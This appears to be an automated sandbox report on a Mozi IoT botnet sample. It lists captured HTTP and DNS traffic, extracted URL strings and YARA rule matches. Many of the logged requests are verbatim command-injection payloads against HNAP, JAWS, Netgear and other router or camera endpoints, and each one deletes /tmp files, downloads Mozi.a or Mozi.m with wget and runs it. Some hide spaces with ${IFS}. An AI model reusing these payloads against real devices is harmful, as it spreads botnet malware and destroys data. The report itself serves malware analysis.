Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 21 Jan 2022 03:34:54 GMTContent-Type: text/htmlContent-Length: 162Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1566Date: Fri, 21 Jan 2022 03:35:11 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 14Content-Type: text/plainData Raw: 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a Data Ascii: 404 Not Found
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 21 Jan 2022 10:00:53 GMTServer: webX-Frame-Options: SAMEORIGINCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 21 Jan 2022 03:35:50 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 21 Jan 2022 03:35:54 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 271Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 6c 6f 63 61 6c 68 6f 73 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at localhost Port 80</address></body></html>

Source: networks.30.dr	String found in binary or memory: http://%s:%d/Mozi.a;chmod
Source: ZFvtIZszMd, networks.30.dr	String found in binary or memory: http://%s:%d/Mozi.a;sh$
Source: networks.30.dr	String found in binary or memory: http://%s:%d/Mozi.m
Source: ZFvtIZszMd, networks.30.dr	String found in binary or memory: http://%s:%d/Mozi.m;
Source: ZFvtIZszMd, networks.30.dr	String found in binary or memory: http://%s:%d/Mozi.m;$
Source: ZFvtIZszMd, networks.30.dr	String found in binary or memory: http://%s:%d/Mozi.m;/tmp/Mozi.m
Source: networks.30.dr	String found in binary or memory: http://%s:%d/bin.sh
Source: ZFvtIZszMd, networks.30.dr	String found in binary or memory: http://%s:%d/bin.sh;chmod
Source: networks.30.dr	String found in binary or memory: http://127.0.0.1
Source: ZFvtIZszMd, networks.30.dr	String found in binary or memory: http://127.0.0.1sendcmd
Source: ZFvtIZszMd, networks.30.dr	String found in binary or memory: http://HTTP/1.1
Source: ZFvtIZszMd, networks.30.dr	String found in binary or memory: http://baidu.com/%s/%s/%d/%s/%s/%s/%s)
Source: kmod.sh.30.dr	String found in binary or memory: http://git.kernel.org/cgit/utils/kernel/kmod/kmod.git/commit/libkmod/libkmod-module.c?id=fd44a98ae2e
Source: .config.30.dr	String found in binary or memory: http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/
Source: networks.30.dr	String found in binary or memory: http://ipinfo.io/ip
Source: alsa-info.sh.30.dr	String found in binary or memory: http://pastebin.ca)
Source: alsa-info.sh.30.dr	String found in binary or memory: http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY
Source: alsa-info.sh.30.dr	String found in binary or memory: http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblah
Source: ZFvtIZszMd, networks.30.dr	String found in binary or memory: http://purenetworks.com/HNAP1/
Source: networks.30.dr	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: networks.30.dr	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: ZFvtIZszMd, networks.30.dr	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope//
Source: alsa-info.sh.30.dr	String found in binary or memory: http://www.alsa-project.org
Source: alsa-info.sh.30.dr	String found in binary or memory: http://www.alsa-project.org.
Source: alsa-info.sh.30.dr	String found in binary or memory: http://www.alsa-project.org/alsa-info.sh
Source: alsa-info.sh.30.dr	String found in binary or memory: http://www.alsa-project.org/cardinfo-db/
Source: alsa-info.sh.30.dr	String found in binary or memory: http://www.pastebin.ca
Source: alsa-info.sh.30.dr	String found in binary or memory: http://www.pastebin.ca.
Source: alsa-info.sh.30.dr	String found in binary or memory: http://www.pastebin.ca/upload.php
Source: motd-news.18.dr	String found in binary or memory: https://ubuntu.com/blog/microk8s-memory-optimisation

Source: unknown

HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 64.34.159.178:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>

Source: unknown

DNS traffic detected: queries for: dht.transmissionbt.com

Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 187.157.44.71:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 161.71.2.41:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 45.8.220.39:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 52.232.110.39:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 83.142.198.185:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 23.12.89.25:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 184.25.176.127:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 200.123.205.169:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 34.98.66.83:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 45.144.3.201:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:

Source: /tmp/ZFvtIZszMd (PID: 5251)

HTML file containing JavaScript created: /usr/networks

Jump to dropped file

Source: ZFvtIZszMd, type: SAMPLE	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5249.1.000000001a019d01.000000004a78c7a2.r-x.sdmp, type: MEMORY	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5247.1.000000001a019d01.000000004a78c7a2.r-x.sdmp, type: MEMORY	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5268.1.000000001a019d01.000000004a78c7a2.r-x.sdmp, type: MEMORY	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
